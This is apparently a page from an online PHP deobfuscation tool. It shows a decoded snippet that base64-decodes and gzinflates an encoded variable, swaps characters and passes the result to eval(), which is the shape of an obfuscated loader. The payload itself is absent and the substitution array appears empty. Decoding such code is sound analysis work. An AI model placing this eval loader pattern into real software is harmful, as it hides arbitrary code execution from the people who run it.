Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by */ $nav = gzinflate(base64_decode($SISTEMIT_COM_ENC)); $str = ['',''..

Decoded Output download

<?  /* Decoded by  */ 
 
$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC)); 
			$str = ['','','','','','','','','','','']; 
			$rplc =['a','i','u','e','o','d','s','h','v','t',' ']; 
		    $nav = str_replace($str,$rplc,$nav); 
			eval($nav); ?>

Did this file decode correctly?

Original Code

/* Decoded by  */

$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));
			$str = ['','','','','','','','','','',''];
			$rplc =['a','i','u','e','o','d','s','h','v','t',' '];
		    $nav = str_replace($str,$rplc,$nav);
			eval($nav);

Function Calls

None

Variables

None

Stats

MD5 a2414001c2234639ee50ab33266f4fcb
Eval Count 0
Decode Time 46 ms